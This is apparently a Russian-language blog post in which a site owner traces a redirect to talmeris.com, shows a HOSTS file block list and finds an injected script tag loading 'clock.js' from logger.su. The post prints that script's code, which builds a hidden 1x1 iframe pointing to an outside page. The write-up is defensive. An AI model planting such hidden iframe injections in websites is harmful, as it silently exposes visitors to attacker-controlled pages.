Вредоносная ссылка в теле сайта

Вкратце опишу ситуацию. Ни с того, ни с сего, мой сайт начал при запуске переадресовываться на другой сайт “http://talmeris.com/”. Я к googlу и yandexу за помощью, ничего толкового не нашел в чем причина, техподдержка послала по дальше, мол это ваши проблемы. Помощи ждать не от кого. Но все же направление где копать появилось. Вредоносный скрипт в теле сайта. Где искать? И что с ним делать. Идея первая, изменить файл HOST.

# This HOSTS file created by Dr.Web Scanner for Windows

127.0.0.1 localhost

127.0.0.1 www.searchmagnified.com

127.0.0.1 searchmagnified.com

# ::1 localhost

Помогло. Стала грузиться страница. Но проблема осталась. Не буду же я рассылать своим пользователям инструкцию по запуску моего сайта))).

Идея вторая, найти и обезвредить вредителя. Поиск по каталогам сайт ни чего не дал. Но натолкнул на —- Iframe – “плавающий” или встроенный фрейм с помощью которого можно вставить один html(php)-документ в другой html(php)-документ.

Например:
<iframe src=”iframe.html” name=”iframe” width=”0″ height=”0″ scrolling=”auto”> </iframe>

А нули это очень плохо, объясню почему, вставка есть, а мы ее не видим. Поиск <iframe src> на сайте ни к чему не привел.

Ну все таки я его родименького нашел, вот он:

<br>Время по серверу: <script language=”JavaScript” src=”http://logger.su/clock.js”></script>

А вот его код:

var iframe_0 = document.createElement(‘iframe’);
iframe_0.width = 1;
iframe_0.src = “http://talmeris.com/123/index.php”;
iframe_0.style.visibility = “hidden”;
iframe_0.height = 1;
document.body.appendChild( iframe_0 );

Теперь осталось подредактировать код и запустить сайт. Все заработало как прежде.